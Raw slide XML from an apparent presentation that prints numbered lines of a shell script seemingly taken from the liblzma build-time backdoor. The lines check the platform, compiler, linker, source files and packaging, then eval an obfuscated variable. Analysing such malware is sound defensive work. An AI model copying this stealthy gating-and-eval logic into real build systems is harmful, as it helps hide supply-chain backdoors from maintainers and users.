                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>-gnu$" &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> 2&gt;&amp;1);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
30 exit 0
31 fi
32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> ! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>qs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> "$R()" $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>srcdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>liblzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/check/crc64_fast.c &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> 2&gt;&amp;1; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
33 exit 0
34 fi
35 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> ! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>qs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> "$R()" $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>srcdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>liblzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/check/crc32_fast.c &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> 2&gt;&amp;1; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
36 exit 0
37 fi
38 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> ! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>qs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> "$R" $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>srcdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>liblzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/check/crc_x86_clmul.h &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> 2&gt;&amp;1; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
39 exit 0
40 fi
41 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> ! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>qs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> "$x" $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>srcdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>liblzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/check/crc_x86_clmul.h &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> 2&gt;&amp;1; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
42 exit 0
43 fi
44 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> test "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>x$GCC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>" != '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>xyes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>' &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null 2&gt;&amp;1;then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
45 exit 0
46 fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1050">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas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2DDAF615-7963-DA9A-D59C-90A084ED2BFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5655879" y="1786758"/>
            <a:ext cx="5835430" cy="424731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47: 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if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 test "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x$CC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" != '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xgcc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' &gt; /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dev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/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null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 2&gt;&amp;1;then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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48: exit 0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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49: fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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50: 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LDv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=$LD" -v"</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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51: 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if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 ! $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LDv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 2&gt;&amp;1 | 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grep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 -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qs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 'GNU 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ld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' &gt; /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dev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/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null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 2&gt;&amp;1;then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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52: exit 0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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53: fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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54: 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if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 ! test -f "$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srcdir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/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tests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/files/$p" &gt; /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dev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/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null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 2&gt;&amp;1;then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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55: exit 0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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56: fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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57: 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if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 ! test -f "$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srcdir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/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tests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/files/$U" &gt; /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dev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/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null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 2&gt;&amp;1;then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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58: exit 0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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59: fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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60: 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if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 test -f "$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srcdir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/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debian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/rules" || test "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x$RPM_ARCH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" = "xx86_64";then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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61: 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eval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 $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zrKcst</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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62: j="^ACLOCAL_M4 = \$(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top_srcdir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)\/aclocal.m4"</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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63: 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if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 ! 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grep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 -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qs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 "$j" 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src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/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liblzma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/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Makefile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 &gt; /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dev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/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null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 2&gt;&amp;1;then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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64: exit 0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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65: fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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66: z="^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am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__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uninstall_files_from_dir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 = {"</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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67: 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if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 ! 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grep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 -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qs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 "$z" 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src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/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liblzma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/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Makefile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 &gt; /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dev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/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null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 2&gt;&amp;1;then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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68: exit 0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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69: fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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70: w="^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am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__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install_max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 ="</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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71: 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if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 ! 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grep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 -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qs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 "$w" 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src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/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liblzma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/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Makefile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 &gt; /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dev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/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null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 2&gt;&amp;1;then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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72: exit 0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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73: fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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74: E=$z</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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75: 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if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 ! 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grep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 -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qs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 "$E" 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src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/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liblzma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/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Makefile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 &gt; /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dev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/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null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 2&gt;&amp;1;then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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76: exit 0</a:t>
